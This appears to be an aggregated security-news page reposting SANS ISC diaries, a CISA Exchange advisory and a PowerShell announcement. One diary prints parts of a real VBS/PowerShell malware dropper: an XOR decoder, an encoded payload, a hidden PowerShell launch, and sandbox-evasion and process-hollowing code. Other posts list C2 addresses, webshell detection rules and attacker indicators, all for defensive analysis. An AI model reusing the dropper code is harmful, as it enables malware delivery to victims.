Announcing PSReadLine 2.2-beta.2 with Dynamic help

This post was originally published on this site

We are pleased to announce the new feature Dynamic Help in
PSReadLine 2.2.0-beta.2.
Features like TabCompletetion and the Help system make PowerShell easier to use. Expanding on that
theme, Dynamic Help provides just-in-time help at the command line. This experience allows you to
stay focused on your work in the terminal without losing your place typing on the pipeline.

Supported Releases

Dynamic Help is implemented and presented through the PSReadLine module. In an effort to bring the
benefits of Dynamic Help to the most users, Dynamic Help is supported down-level to Windows
PowerShell 5.1.

PSReadLine 2.2.0-beta2, including Dynamic Help, is supported in the following versions:

  • Windows PowerShell 5.1
  • PowerShell 7.0+

Install PSReadLine with Dynamic Help

To receive the benefits of Dynamic Help, download and install the PSReadLine module from PSGallery.

Install-Module PSReadLine -AllowPrerelease

Getting Cmdlet Help

Dynamic Help provides a view of full cmdlet help shown on an alternative screen buffer using a cross
platform Pager utility. PSReadLine maps the function ShowCommandHelp to the F1 key.

  • When the cursor is at the end of a fully expanded cmdlet, pressing F1 displays the help for
    that cmdlet.
  • When the cursor is at the end of a fully expanded parameter, pressing F1 displays the help
    beginning at the parameter.

Image DynHelp1

The Pager in PSReadLine supports viewing content one screen at a time. To navigate the displayed
help content, press the up and down arrow keys to scroll the screen. Pressing Q exits the
alternative screen buffer and returns to the current cursor location in the the primary screen

The Pager is a work in progress and we welcome your feedback and suggestions. To provide feedback
and for more information, see the Pager repository on GitHub.

Focused Parameter Help

Pressing the Alt-h key combination provides dynamic help for parameters. The help is shown below
the current command line like MenuComplete. The cursor must be at the end of the fully-expanded
parameter name when you press the Alt-h key.

Image DynHelp Alt H


The PSReadLine function ShowParameterHelp is bound to Alt-h.
The Alt bindings do not currently work on macOS as detailed in this
issue. Mac users will need to map
ShowParameterHelp function to an available key combination.

Set-PSReadLineKeyHandler -chord "Ctrl-l" -Function ShowParameterHelp

Selection of Arguments

To rapidly select and change the arguments of a cmdlet without disturbing your syntax, press
Alt-a. Selection of arguments is scoped within a script block. Based on the cursor position, it
searches from the innermost script block to the outmost script block, and stops when it finds any
arguments in a script block scope.

Image dynhelpA


The PSReadLine function SelectCommandArgument is bound to
Alt-a. The Alt bindings do not currently work on macOS as detailed in this
issue. Mac users will need to map
SelectCommandArgument function to an available key combination.

Set-PSReadLineKeyHandler -chord "Ctrl-k" -function SelectCommandArgument

Feedback and Support

Community feedback is essential to the iterative development of PSReadLine and features like Dynamic
Help. Thank you for your continued support and engagement. To file issues for PSReadLine or Dynamic
Help, please visit the PSReadLine repository.

Jason Helmick

PowerShell Team

The post Announcing PSReadLine 2.2-beta.2 with Dynamic help appeared first on PowerShell Team.

Spam Farm Spotted in the Wild, (Fri, Mar 5th)

This post was originally published on this site

If there is a place where you can always find juicy information, it's your spam folder! Yes, I like spam and I don't delete my spam before having a look at it for hunting purposes. Besides emails flagged as spam, NDR or "Non-Delivery Receipt" messages also deserve some attention. One of our readers (thanks to him!) reported yesterday how he found a "spam farm" based on bounced emails. By default, SMTP is a completely open protocol. Everybody can send an email pretending to be Elon Musk or Joe Biden! That's why security control like SPF[1] or DKIM[2] can be implemented to prevent spoofed emails to be sent from anywhere. If not these controls are not implemented, you may be the victim of spam campaigns that abuse your domain name or identity. The "good" point (if we can say this) is that all NDR messages will bounce to the official mail server that you manage. That's what happened with our reader, he saw many bounced messages for unknown email addresses. Here is an example:

Content-type: text/plain; charset=us-ascii

This message was created automatically by mail delivery software.

A message that you sent could not be delivered to one or more of its
recipients. This is a permanent error. The following address(es) failed:

    host [victimmx]
    SMTP error from remote mail server after end of data:
    550 5.2.0 Mail rejete. Mail rejected. ************

Content-type: message/delivery-status

Reporting-MTA: dns; fjimkopo[.]com

Action: failed
Final-Recipient: rfc822;[victim]@[victimdomain]
Status: 5.0.0
Remote-MTA: dns; [victimmx]
Diagnostic-Code: smtp; 550 5.2.0 Mail rejete. Mail rejected. ***********

Content-type: message/rfc822

Return-path: <[ourmailbox]@[ourdomain]>
Received: from admin by fjimkopo[.]com with local (Exim 4.86_2)
(envelope-from [ourmailbox]@[ourdomain])
id 1lHQYA-0002y9-UD
for [victim]@[victimdomain]; Wed, 03 Mar 2021 12:24:22 +0000
To: [victim]@[victimdomain]
Subject: *****************
X-PHP-Originating-Script: 1000:mailer1.php
Date: Wed, 3 Mar 2021 12:24:22 +0000
From: ***************** [ourmailbox]@[ourdomain]>
Reply-To: oev4228@outlook[.]com
Message-ID: <1e0b99b15ab141dc32cdf034e0bee3d4@farments[.]cf>
MIME-Version: 1.0
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 8bit

What interesting information do we have in this email? We see a domain name: farments[.]cf in the Message-ID (this header is generated by the first hop in the SMTP delivery chain) but also another SMTP header added by the mailer: X-PHP-Originating-Script: 1000:mailer1.php.

Let's combine the domain with the URL in the header: hxxp://farments[.]cf/mailer1.php

This is a leafmailer[3] instance… A very popular PHP mailer used by spammers. reports 26 similar websites[4]:

I did the same search on VirusTotal and found more URLs:


Many of them are compromised websites where the mailer is deployed and used to send spam.

Conclusion: Keep an eye on your bounced messages, sometimes they may reveal interesting information!


Xavier Mertens (@xme)
Senior ISC Handler – Freelance Cyber Security Consultant

(c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.

From VBS, PowerShell, C Sharp, Process Hollowing to RAT, (Thu, Mar 4th)

This post was originally published on this site

VBS files are interesting to deliver malicious content to a victim's computer because they look like simple text files. I found an interesting sample that behaves like a dropper. But it looks also like Russian dolls seeing all the techniques used to drop a RAT at the end. The file hash is 8697dc74d7c07583f24488926fc6e117975f8a9f014972073d19a5e62d248ead and has a VT score of 12/59[1]. It was delivered by email under the name "Procurement – Attached RFQ 202102.vbs". If you filter attachments based on the MIME type, this file won't be detected as suspicious:

remnux@remnux:/MalwareZoo/20210303$ file *.vbs
Procurement - Attached RFQ 202102.vbs: ASCII text, with very long lines, with CRLF line terminators

When you try to open a .vbs file on a standard Windows system, it is processed by the "Microsoft ® Windows Based Script Host" handlers. Here is the code executed when you open this script:

Private Function vQ(Inp, Key, Mode)
    Dim z, i, Position, cptZahl, orgZahl, keyZahl, cptString
    For i = 1 To lEn(Inp)
        Position = Position + 1
        If Position > lEn(Key) Then Position = 1
        keyZahl = aSc(Mid(Key, Position, 1))
        If Mode Then  
            orgZahl = aSc(Mid(Inp, i, 1))
            cptZahl = orgZahl Xor keyZahl
            cptString = hEx(cptZahl)
            If lEn(cptString) < 2 Then cptString = "0" & cptString
            z = z & cptString  
            If i > lEn(Inp)  2 Then Exit For
            cptZahl = CByte("&" & "H" & Mid(Inp, i * 2 - 1, 2))
            orgZahl = cptZahl Xor keyZahl
            z = z & cHR(orgZahl)
        End If
    vQ = z
End Function

Dim AqUhNbgAqwpMb
AqUhNbgAqwpMb = "31562B0462222C4B781D323A2D1E1D4A2C4C39202E190F14112E3A1E0C432A5A454C1D392A1D1B5127260F22381E3D086E011F012E5B451B3F594B23031B217726535F5863201340205A593D28000E59003C3F173249335C144C493D4B234509370B044D5072585B17233B5F24703426190F7F363A1E2C2609173F552B09244B5C3E6C7D195D23136E015E2C501F0E5A453E314C34493D28331E507B394603242E526226063C291E0C08134726227F447D72334A3C1D3158532D3C4C7E754425390E0D7841200A0F0F03316A26505E3A413119576F141679085C2D5551445420325134502C1C1E5C0B153D131E3E41505D7303180A7F1F1F7D0E2D733E03126F215C7B794641334B58766C1A567E515B78093F0E0A540E7908027F05166B241E681C5379264B... (remaining bytes removed)

Dim SH
SH = cHR(80 + 7) & cHR(100 + 15) & cHR(66 + 1) & cHR(80 + 2) & cHR(110 - 5) & cHR(85 - 5) & cHR(80 + 4) & cHR(40 + 6) & cHR(230 / 2) & cHR(36 * 2) & cHR(60 + 9) & cHR(100 + 8) & cHR(70 + 6)
Set WS = CreateObject(SH)
Set FSO = CreateObject("Scripting.FileSystemObject")
Set MyFile = FSO.CreateTextFile(FSO.GetSpecialFolder(2) + "OS64Bits.PS1", True)
MyFile.WriteLine(rEPlAcE(vQ(AqUhNbgAqwpMb, "p2O)6[.X0sI^{p(@5wAC|/Gh]N{am}3+(rNY3]>UK|/2_YlCUfqK{hZL*.NawX9G>:x.I", False), "%VBS%", wscript.SCRIPTFULLNAME))
WS.rUN "POWERSHELL -eXEcUTiONpOLicY rEmOtEsIgNeD -FILE " & FSO.GetSpecialFolder(2) + "OS64Bits.PS1", 0

The payload is stored in AqUhNbgAqwpMb and decoded by the vQ().This function is an XOR-decoder using a muli-bytes key. The decoded payload is dropped on the filesystem (C:Users<user>AppDataLocalTempOS64Bits.PS1) and executed by PowerShell. This script looks interesting at multiple points.

First, most suspicious strings are obfuscated and binary encoded. Decoding is performed via a specific function:

Function Binary2String([String] $data) {
    $byteList = [System.Collections.Generic.List[Byte]]::new()
    for ($i = 0; $i -lt $data.Length; $i +=8) {
        $byteList.Add([Convert]::ToByte($data.Substring($i, 8), 2))
    return [System.Text.Encoding]::ASCII.GetString($byteList.ToArray())

There is a detection mechanism of virtual environments:

Function VirtualMachineDetector() {
    $searcher = (New-Object System.Management.ManagementObjectSearcher(Select * from Win32_ComputerSystem))
    $items = $searcher.Get()
    $Tr = ""
    foreach ($item in $items) {
        [String] $manufacturer = $item["Manufacturer"].ToString().ToLower()
        if (($manufacturer -eq "microsoft corporation" -and 
           $item["Model"].ToString().ToUpperInvariant().Contains("VIRTUAL")) -or 
           $manufacturer.Contains("vmware") -or $item["Model"].ToString() -eq "VirtualBox") {
             $Tr = "True"
        } else {
             $Tr = "False"
     return $Tr

Note also the presence of a function to detect Sandboxie[2], another sandbox tool that is easy to spot by tracking the DLL SbieDll.dll:

Function DetectSandboxie() {
    [Int32] $i = ModuleHandle("SbieDll.dll")
    [String] $s = ""
    if ($i -eq 0) {
        $s = "False"
    } else {
        $s = "True"
    return $s

 The most interesting function is CodeDom. It invokes the CSharp compiler to compile the next payload:

function CodeDom([Byte[]] $BB, [String] $TP, [String] $MT) {
    $dictionary = new-object 'System.Collections.Generic.Dictionary[[string],[string]]'
    $dictionary.Add(("CompilerVersion"), ("v4.0"))
    $CsharpCompiler = New-Object Microsoft.CSharp.CSharpCodeProvider($dictionary)
    $CompilerParametres = New-Object System.CodeDom.Compiler.CompilerParameters
    $CompilerParametres.IncludeDebugInformation = $false
    $CompilerParametres.GenerateExecutable = $false
    $CompilerParametres.GenerateInMemory = $true
    $CompilerParametres.CompilerOptions += ("/platform:X86 /unsafe /target:library")

    $BB = Decompress($BB)

    [System.CodeDom.Compiler.CompilerResults] $CompilerResults = 

    [Type] $T = $CompilerResults.CompiledAssembly.GetType($TP)

    [Byte[]] $Bytes =  Decompress(@( 
      (bytes removed)

    try {
        [String] $MyPt = 
        [Object[]] $Params=@($MyPt.Replace("Framework64","Framework") ,$Bytes)
        return $T.GetMethod($MT).Invoke($null, $Params)
    } catch { }

The CSharp code is located in the variable BB (I posted the code on Pastebin[3]). By having a look at the code, we can see a bunch of interesting API calls:

private static readonly DelegateVirtualAllocEx VirtualAllocEx = LoadApi<DelegateVirtualAllocEx>(ReverseString(Kernel32), ReverseString(VirtualAllcEx)); 
private static readonly DelegateWriteProcessMemory WriteProcessMemory = LoadApi<DelegateWriteProcessMemory>(ReverseString(Kernel32), ReverseString(WriteProcessMem)); 
private static readonly DelegateReadProcessMemory ReadProcessMemory = LoadApi<DelegateReadProcessMemory>(ReverseString(Kernel32), ReverseString(ReadProcessMem)); 
private static readonly DelegateZwUnmapViewOfSection ZwUnmapViewOfSection = LoadApi<DelegateZwUnmapViewOfSection>(ReverseString(ntdll), ReverseString(ZwUnmapViewOfSec)); 
private static readonly DelegateCreateProcessA CreateProcessA = LoadApi<DelegateCreateProcessA>(ReverseString(Kernel32), ReverseString(CreateProcA));

This clearly indicates that process hollowing is used to replace the code of a legit process with malicious code. This code is located in the variable Bytes and is a PE file (SHA256:D452CEE94E3A2D58B05E9F62A4AA4004C0632D9B56FA8B57664D295BC88C4DF0) that tries to communicate with a C2 server located at on port 8989. The malware belongs to the AsyncRat[4] family. 

Note: My advice to protect yourself against such malicious .vbs file is to replace the default app to open them with notepad.exe. 


Xavier Mertens (@xme)
Senior ISC Handler – Freelance Cyber Security Consultant

(c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.

AA21-062A: Mitigate Microsoft Exchange Server Vulnerabilities

This post was originally published on this site

Original release date: March 3, 2021


Cybersecurity and Infrastructure Security (CISA) partners have observed active exploitation of vulnerabilities in Microsoft Exchange Server products. Successful exploitation of these vulnerabilities allows an unauthenticated attacker to execute arbitrary code on vulnerable Exchange Servers, enabling the attacker to gain persistent system access, as well as access to files and mailboxes on the server and to credentials stored on that system. Successful exploitation may additionally enable the attacker to compromise trust and identity in a vulnerable network. Microsoft released out-of-band patches to address vulnerabilities in Microsoft Exchange Server. The vulnerabilities impact on-premises Microsoft Exchange Servers and are not known to impact Exchange Online or Microsoft 365 (formerly O365) cloud email services.

This Alert includes both tactics, techniques and procedures (TTPs) and the indicators of compromise (IOCs) associated with this malicious activity. To secure against this threat, CISA recommends organizations examine their systems for the TTPs and use the IOCs to detect any malicious activity. If an organization discovers exploitation activity, they should assume network identity compromise and follow incident response procedures. If an organization finds no activity, they should apply available patches immediately and implement the mitigations in this Alert.

Click here for IOCs in STIX format.

Technical Details

Microsoft has released out-of-band security updates to address four vulnerabilities in Exchange Server:

  • CVE-2021-26855 allows an unauthenticated attacker to send arbitrary HTTP requests and authenticate as the Exchange Server. The vulnerability exploits the Exchange Control Panel (ECP) via a Server-Side Request Forgery (SSRF). This would also allow the attacker to gain access to mailboxes and read sensitive information.
  • CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065 allow for remote code execution.  
    • CVE-2021-26858 and CVE-2021-27065 are similar post-authentication arbitrary write file vulnerabilities in Exchange. An attacker, authenticated either by using CVE-2021-26855 or via stolen admin credentials, could write a file to any path on the server.

    • CVE-2021-26857 is an insecure deserialization vulnerability in the Unified Messaging service. An attacker, authenticated either by using CVE-2021-26855 or via stolen admin credentials, could execute arbitrary code as SYSTEM on the Exchange Server.

  • To locate a possible compromise of these CVEs, we encourage you to read the Microsoft Advisory.

It is possible for an attacker, once authenticated to the Exchange server, to gain access to the Active Directory environment and download the Active Directory Database.

Tactics, Techniques and Procedures

The majority of the TTPs in this section are sourced from a blog post from Veloxity, a third party cybersecurity firm. Note: the United States Government does not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply their endorsement, recommendation, or favoring by the United States Government.

Veloxity has observed the following files as targets of HTTP POST requests:

  • /owa/auth/Current/themes/resources/logon.css
  • /owa/auth/Current/themes/resources/owafont_ja.css
  • /owa/auth/Current/themes/resources/lgnbotl.gif
  • /owa/auth/Current/themes/resources/owafont_ko.css
  • /owa/auth/Current/themes/resources/SegoeUI-SemiBold.eot
  • /owa/auth/Current/themes/resources/SegoeUI-SemiLight.ttf
  • /owa/auth/Current/themes/resources/lgnbotl.gif

Administrators should search the ECP server logs for the following string (or something similar):


The logs can be found at <exchange install path>LoggingECPServer.

To determine possible webshell activity, administrators should search for aspx files in the following paths:

  • inetpubwwwrootaspnet_client (any .aspx file under this folder or sub folders)
  • <exchange install path>FrontEndHttpProxyecpauth (any file besides TimeoutLogoff.aspx)
  • <exchange install path>FrontEndHttpProxyowaauth (any file or modified file that is not part of a standard install)
  • <exchange install path>FrontEndHttpProxyowaauthCurrent (any aspx file in this folder or subfolders)
  • <exchange install path>FrontEndHttpProxyowaauth<folder with version number> (any aspx file in this folder or subfolders)

Administrators should search in the /owa/auth/Current directory for the following non-standard web log user-agents. These agents may be useful for incident responders to look at to determine if further investigation is necessary.

These should not be taken as definitive IOCs:

  • DuckDuckBot/1.0;+(+
  • facebookexternalhit/1.1+(+
  • Mozilla/5.0+(compatible;+Baiduspider/2.0;++
  • Mozilla/5.0+(compatible;+Bingbot/2.0;++
  • Mozilla/5.0+(compatible;+Googlebot/2.1;++
  • Mozilla/5.0+(compatible;+Konqueror/3.5;+Linux)+KHTML/3.5.5+(like+Gecko)+(Exabot-Thumbnails)
  • Mozilla/5.0+(compatible;+Yahoo!+Slurp;+
  • Mozilla/5.0+(compatible;+YandexBot/3.0;++
  • Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/51.0.2704.103+Safari/537.36

Veloxity observed these user-agents in conjunction with exploitation to /ecp/ URLs:

  • ExchangeServicesClient/
  • python-requests/2.19.1
  • python-requests/2.25.1

These user-agents were also observed having connections to post-exploitation web-shell access:

  • antSword/v2.1
  • Googlebot/2.1+(+
  • Mozilla/5.0+(compatible;+Baiduspider/2.0;++

As with the non-standard user-agents, responders can examine internet information services (IIS) logs from Exchange Servers to identify possible historical activity. Also, as with the non-standard user agents, these should not be taken as definitive IOCs:

  • POST /owa/auth/Current/
  • POST /ecp/default.flt
  • POST /ecp/main.css
  • POST /ecp/<single char>.js

Volexity has seen attackers leverage the following IP addresses. Although these are tied to virtual private servers (VPSs) servers and virtual private networks (VPNs), responders should investigate these IP addresses on their networks and act accordingly:


Volexity has also provided the following YARA signatures that can be run within your network to assist in finding signs of a compromise.

rule webshell_aspx_simpleseesharp : Webshell Unclassified
        author = “”
        date = “2021-03-01”
        description = “A simple ASPX Webshell that allows an attacker to write further files to disk.”
        hash = “893cd3583b49cb706b3e55ecb2ed0757b977a21f5c72e041392d1256f31166e2”
        $header = “<%@ Page Language=”C#” %>”
        $body = “<% HttpPostedFile thisFile = Request.Files[0];thisFile.SaveAs(Path.Combine”
        $header at 0 and
        $body and
        filesize < 1KB
rule webshell_aspx_reGeorgTunnel : Webshell Commodity
        author = “”
        date = “2021-03-01”
        description = “A variation on the reGeorg tunnel webshell”
        hash = “406b680edc9a1bb0e2c7c451c56904857848b5f15570401450b73b232ff38928”
        reference = “”
        $s1 = “System.Net.Sockets”
        $s2 = “System.Text.Encoding.Default.GetString(Convert.FromBase64String(StrTr(Request.Headers.Get”
        // a bit more experimental
        $t1 = “.Split(‘|’)”
        $t2 = “Request.Headers.Get”
        $t3 = “.Substring(“
        $t4 = “new Socket(“
        $t5 = “IPAddress ip;”
        all of ($s*) or
        all of ($t*)
rule webshell_aspx_sportsball : Webshell Unclassified
        author = “”
        date = “2021-03-01”
        description = “The SPORTSBALL webshell allows attackers to upload files or execute commands on the system.”
        hash = “2fa06333188795110bba14a482020699a96f76fb1ceb80cbfa2df9d3008b5b0a”
        $uniq1 = “HttpCookie newcook = new HttpCookie(”fqrspt”, HttpContext.Current.Request.Form”
        $uniq2 = “ZN2aDAB4rXsszEvCLrzgcvQ4oi5J1TuiRULlQbYwldE=”
        $var1 = “Result.InnerText = string.Empty;”
        $var2 = “newcook.Expires = DateTime.Now.AddDays(”
        $var3 = “System.Diagnostics.Process process = new System.Diagnostics.Process();”
        $var4 = “process.StandardInput.WriteLine(HttpContext.Current.Request.Form[””
        $var5 = “else if (!string.IsNullOrEmpty(HttpContext.Current.Request.Form[””
        $var6 = “<input type=”submit” value=”Upload” />”
        any of ($uniq*) or
        all of ($var*)

A list of web shell hashes have also been provided by Microsoft:

  • b75f163ca9b9240bf4b37ad92bc7556b40a17e27c2b8ed5c8991385fe07d17d0
  • 097549cf7d0f76f0d99edf8b2d91c60977fd6a96e4b8c3c94b0b1733dc026d3e
  • 2b6f1ebb2208e93ade4a6424555d6a8341fd6d9f60c25e44afe11008f5c1aad1
  • 65149e036fff06026d80ac9ad4d156332822dc93142cf1a122b1841ec8de34b5
  • 511df0e2df9bfa5521b588cc4bb5f8c5a321801b803394ebc493db1ef3c78fa1
  • 4edc7770464a14f54d17f36dc9d0fe854f68b346b27b35a6f5839adf1f13f8ea
  • 811157f9c7003ba8d17b45eb3cf09bef2cecd2701cedb675274949296a6a183d
  • 1631a90eb5395c4e19c7dbcbf611bbe6444ff312eb7937e286e4637cb9e72944

Note: this is not an all-inclusive list of indicators of compromise and threat actors have been known to use short-term leased IP addresses that change very frequently. Organizations that do not locate any of the IOCs in this Alert within your network traffic, may nevertheless have been compromised. CISA recommendations following the guidance located in the Microsoft Advisory to check your servers for any signs of a compromise.  

Conduct Forensic Analysis

Should your organization see evidence of compromise, your incident response should begin with conducting forensic analysis to collect artifacts and perform triage. Please see the following list of recommendations on how to conduct forensic analysis using various tools.

Although the following free tools are not endorsed by the Federal Government, incident responders commonly use them to perform forensics.

While collecting artifacts to perform triage, use processes and tools that minimize the alteration of the data being collected and that minimize impact to the operating system itself.

Ideally, during data collection, store the data on removable/external media and, when possible, run the artifact collection tools from the same media.

Key artifacts for triage that should be collected:

  • Memory
  • All registry hives
  • All windows event logs
  • All web logs

Memory can be collected with a variety of open source tools (e.g., FTK Imager by AccessData, Ram Capture by Belkasoft).

Registry and Windows Event logs can be collected with a variety of open source tools as well (e.g., FTK_Imager, Kroll Artifact Parser And Extractor [KAPE]).

Web logs can also be collected with a variety of open source tools (e.g. FTK Imager).

Windows Artifact Collection Guide

Execute the following steps in order.

1) Download the latest FTK Imager from

  • Note: Ensure your review of and compliance with the applicable license associated with the product referenced, which can be found in the product’s User Guide. The United States Government does not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply their endorsement, recommendation, or favoring by the United States Government.

2) Collect memory from live system using FTK Imager. See Memory Capture with FTK Imager.pdf for instructions. Note: Download and copy “FTK Imager” folder to an external drive. Run FTK Imager.exe from the FTK Imager folder from external drive. Wait until memory collect is complete before proceeding to step 2.

3) Collect important system artifacts using KAPE. See KAPE Collection Procedure. Note: Download KAPE from a separate system; do not download KAPE to the target system. Run KAPE from external drive.

4) Collect disk image using FTK Imager. See Live Image with FTK Imager.pdf for instructions. Note: Run FTK Imager.exe from the “FTK Imager” folder from external drive.

Memory Capture with FTK Imager

1) Open FTK Imager. Log into the system with Administrator privileges and launch “FTK Imager.”

2) Open “Capture Memory.” Select “Capture Memory…” from the File menu.

Figure 1: FTK Imager – Capture Memory Command

3) Select Path and Filenames. On the window that appears, use the “Browse” button to identify the destination of the memory capture. Save the memory capture to an external device and not the main hard drive of the system. Doing so will prevent the saved file from overwriting any dataspace on the system.

  • Name the destination file with a descriptive name (i.e., hostname of the system).
  • Select the box “Include pagefile” and provide a name of the pagefile that is descriptive of the system.
  • Do not select “Create AD1 file.”

Figure 2: FTK Imager – Memory Capture

4) Capture Memory. Click on “Capture Memory” to begin the capture process. The process will take several minutes depending on the size of the pagefile and the amount of memory on the system.

Figure 3: FTK Imager – Memory Capture

KAPE Collection Procedure [1]

1) Download KAPE from

2) Disable any antivirus or host protection mechanisms that prevent execution from removable media, or data loss prevention (DLP) mechanisms that restrict utilization of removable media.

  • Enable antivirus and host protection once this process is completed.

3) Unzip and run gkape.exe as admin from your removable media

4) Target source should be the drive on which the OS resides, typically C:.

5) Target destination should be an external drive folder, not the same drive as the Target source. If available, use an external hard drive or flash drive.

  • A KAPE execution with these parameters will typically produce output artifacts with a total size of 1-25 GB.
  • If you are going to be running KAPE on different machines and want to save to the same drive, ensure the Target destination folder is unique for each execution of KAPE.

6) Uncheck Flush checkbox (it is checked natively).

7) Check Add %d and Add %m checkboxes.

8) Select ALL checkboxes to ensure KAPE will target all available data that it is capable of targeting. This takes some time; use the down arrow and space bar to move through the list quickly.

9) Check Process VSCs checkbox.

10) Select Zip radio button and add Base name TargetOutput.

11) Ensure Deduplicate checkbox is checked (it is checked natively).

  • At the bottom you should now see a large Current command line, similar to:
.kape.exe –tsource C: –tdest E:%d%m –tflush –target !BasicCollection,!SANS_Triage,Avast,AviraAVLogs,Bitdefender,ComboFix,ESET,FSecure,HitmanPro,Malwarebytes, McAfee,McAfee_ePO,RogueKiller,SentinelOne,Sophos,SUPERAntiSpyware,Symantec_AV_Logs,TrendMicro,VIPRE, Webroot,WindowsDefender,Ammyy,AsperaConnect,BoxDrive,CiscoJabber,CloudStorage,ConfluenceLogs,Discord, Dropbox, Exchange,ExchangeClientAccess,ExchangeTransport,FileZilla,GoogleDrive,iTunesBackup,JavaWebCache,Kaseya,LogMeIn,Notepad++, OneDrive,OutlookPSTOST,ScreenConnect,Skype,TeamViewerLogs,TeraCopy,VNCLogs, Chrome,ChromeExtensions,Edge,Firefox,InternetExplorer,WebBrowsers,ApacheAccessLog,IISLogFiles,ManageEngineLogs, MSSQLErrorLog,NGINXLogs,PowerShellConsole,KapeTriage,MiniTimelineCollection,RemoteAdmin, VirtualDisks, Gigatribe,TorrentClients,Torrents,$Boot,$J,$LogFile,$MFT,$SDS,$T,Amcache,ApplicationEvents,BCD,CombinedLogs, EncapsulationLogging,EventLogs,EventLogs-RDP,EventTraceLogs, EvidenceOfExecution,FileSystem,GroupPolicy,LinuxOnWindowsProfileFiles,LnkFilesAndJumpLists,LogFiles,MemoryFiles, MOF,OfficeAutosave,OfficeDocumentCache,Prefetch,RDPCache,RDPLogs,RecentFileCache,Recycle, RecycleBin, RecycleBinContent,RecycleBinMetadata,RegistryHives,RegistryHivesSystem,RegistryHivesUser,ScheduledTasks,SDB, SignatureCatalog,SRUM,StartupInfo,Syscache,ThumbCache,USBDevicesLogs,WBEM,WER,WindowsFirewall,  WindowsIndexSearch,WindowsNotifcationsDB,WindowsTimeline,XPRestorePoints –vss –zip TargetOutput –gui
  • In the bottom right corner hit the Execute! Button.
  • Screenshot below shows gkape.exe during execution, you will also see a command window execute. Note: KAPE usually takes less than 20 minutes to complete on a workstation; if it is taking significantly longer there may be an issue.

Figure 4: gkape.exe screenshot


CISA strongly recommends organizations read Microsoft’s advisory and security blog post for more information on how to look for this malicious activity and apply critical patches as soon as possible.

If patching is not an immediate option, there are other mitigation options available. However, these options should only be used as a temporary solution, not a replacement for patching.  CISA recommends limiting or blocking external access to internet-facing Exchange Servers via the following:

  • Restrict untrusted connections to port 443, or set up a VPN to separate the Exchange Server from external access; note that this will not prevent an adversary from exploiting the vulnerability if the attacker is already in your network.
  • Block external access to on-premise Exchange:
    • Restrict external access to OWA URL: /owa/
    • Restrict external access to Exchange Admin Center (EAC) aka Exchange Control Panel (ECP): url /ecp/.

CISA would like to thank Microsoft and Volexity for their contributions to this alert.





  • March 3, 2021: Initial Version

This product is provided subject to this Notification and this Privacy & Use policy.

Qakbot infection with Cobalt Strike, (Wed, Mar 3rd)

This post was originally published on this site


On Tuesday 2021-03-02, I generated a Qakbot (Qbot) infection on a Windows host in one of my Active Directory (AD) test environments, where I saw Cobalt Strike as follow-up activity.  I've seen Cobalt Strike from Qakbot infections before.  Below are two that I documented in December 2020.

I haven't documented one for the ISC yet, so today's diary reviews my Qakbot infection with Cobalt Strike seen on Tuesday 2021-03-02.

Shown above:  Flow chart for the Qakbot infection with Cobalt Strike from Tuesday 2021-03-02.


Shown above:  Spreadsheet extracted from a zip archive attached to malspam pushing Qakbot.

Shown above:  Traffic from the infection filtered in Wireshark (image 1 of 3).

Shown above:  Traffic from the infection filtered in Wireshark (image 2 of 3).

Shown above:  Traffic from the infection filtered in Wireshark (image 3 of 3).

Shown above:  Initial DLL saved a the victim's Windows host.

Shown above:  Artifact saved to disk during the Qakbot infection.

Shown above:  Registry updates caused by Qakbot.

Indicators of Compromise (IOCs)

Malware from the infected Windows host:

SHA256 hash: 16a0c2f741a14c423b7abe293e26f711fdb984fc52064982d874bf310c520b12

SHA256 hash: 24753d9f0d691b6d582da3e301b98f75abbdb5382bb871ee00713c5029c56d44

Traffic to retrieve the initial Qakbot DLL:

  • 8.209.64[.]96 port 80 – kfzhm28pwzrlk02bmjy[.]com – GET /mrch.gif

Qakbot C2 traffic:

  • 207.246.77[.]75 port 995 – HTTPS traffic

Cobalt Strike traffic:

  • 45.144.29[.]185 port 443 – HTTPS traffic
  • 45.144.29[.]185 port 443 – logon.securewindows[.]xyz – HTTPS traffic
  • 45.144.29[.]185 port 8080 – 45.144.29[.]185:8080 – GET /WjSH
  • 45.144.29[.]185 port 8080 – logon.securewindows[.]xyz:8080 – GET /cx
  • 45.144.29[.]185 port 8080 – 45.144.29[.]185:8080 – GET /en_US/all.js
  • 45.144.29[.]185 port 8080 – 45.144.29[.]185:8080 – POST /submit.php?id=248927919

Final words

A pcap of the infection traffic and the associated malware can be found here.

Brad Duncan
brad [at]

(c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.

Adversary Simulation with Sim, (Tue, Mar 2nd)

This post was originally published on this site

One of the best ways to test your detection portfolio is to emulate user actions on monitored systems.

I spotted Sim via Twitter and was immediately intrigued as I advocate strongly for any tools and features that enable configurable adversary emulation. Adversary emulation enables blue teams to validate and optimize their detection portfolio and thus determine the true efficacy of their detective capabilities. I do not consider any detection that has not been tested via direct purple or red team engagement, or via automated adversary emulation, as production ready. Per her GitHub repoHope Walker’s Sim is a C# application, configured via an XML file, that performs tasks based on the configuration to resemble user actions on a system in order to facilitate training and education. As a long time SOC and DFIR manager, training for me includes “training” detection and models to ensure optimal performance. IceMoonHSV’s projects appear to be fairly recent contributions to our community, I applaud Hope’s work here and offer a hearty welcome.

Again, referring to her repo content, user actions can be scripted using the task block in an XML configuration file where tasks are comprised of two components:

  • Task configuration: three configuration tags determine the name of the task (for error tracing and configuration), the number of times the task will <loop>, and how long to <pause> between each action.
  • Task actions: Many actions can be configured but it is recommended to maintain task granularity for more narrow, specified testing. Create multiple, scenario based config files, and run individual tests instead. Sim execute <actions> as part of user simulation. Sim performs each action as if scripted, executing one action after the other in sequential order. Sim does not wait for one action to complete before starting another, thus the importance of the <pause> and <sleep> tags.

Read the rest of Hope’s documentation for yourselves, there are plenty of details as to action configurations including <setclipboard><getclipboard>, and <plain> for plain text typed as if a user typing sequentially. There are numerous special key options as well as the ability to call executables via <process> and run PowerShell commands with <powershell>.

